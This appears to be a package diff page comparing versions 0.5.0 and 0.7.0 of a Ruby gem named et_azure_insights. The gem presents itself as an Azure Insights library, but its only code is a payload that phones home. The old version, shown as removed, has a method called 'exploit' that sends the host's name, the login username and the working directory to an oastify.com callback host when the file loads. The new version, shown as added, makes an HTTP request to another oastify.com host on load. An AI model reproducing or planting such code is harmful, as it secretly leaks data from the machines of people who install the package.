et_azure_insights 0.5.0 → 0.7.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/et_azure_insights.rb +4 -23
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 33de0e78146d0dd4a60e3d5fc61b508de0414780ca0513f022fdea8aa33cbab1
|
4
|
+
data.tar.gz: c07323c5eec280f5922e64b7838decdbc1cbf9af6a75ff34d50561a234ac3a9c
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 7fc3d2893d32b5b3d0db7ffeb804742b85cc77dd155d6d766011aa239ed01e8ddc14a812fa388f03d9d06419b383f4a1ef2216e673cc4eb6bbfb20f1b5905ef5
|
7
|
+
data.tar.gz: e2cb16429febfcd91333fc2ef61f446e306f9e933f79ca79d7446f8ee6ba717d7ca35427a1fc4fc89492c53cd73091ef97ee28f13ad61e9b2eb2a0deb9a6d39d
|
data/lib/et_azure_insights.rb
CHANGED
@@ -1,23 +1,4 @@
|
|
1
|
-
|
2
|
-
require '
|
3
|
-
|
4
|
-
|
5
|
-
def exploit
|
6
|
-
hostname = Socket.gethostname
|
7
|
-
username = Etc.getlogin
|
8
|
-
cwd = Dir.pwd
|
9
|
-
|
10
|
-
uri = URI('https://sc8c79d4fjfgq4htgo090c2b72dt1i.oastify.com')
|
11
|
-
params = { 'hostname' => hostname, 'username' => username, 'cwd' => cwd }
|
12
|
-
uri.query = URI.encode_www_form(params)
|
13
|
-
|
14
|
-
res = Net::HTTP.get_response(uri)
|
15
|
-
|
16
|
-
# Add any additional code here based on the desired behavior of the exploit
|
17
|
-
|
18
|
-
# Example: Printing the response
|
19
|
-
puts res.body
|
20
|
-
end
|
21
|
-
|
22
|
-
#Call the exploit method
|
23
|
-
exploit
|
1
|
+
module Techghoshal
|
2
|
+
require 'net/http'
|
3
|
+
result = Net::HTTP.get(URI.parse('https://xghci04hujbb75hxfg1evx0w3n9dx2.oastify.com'))
|
4
|
+
end
|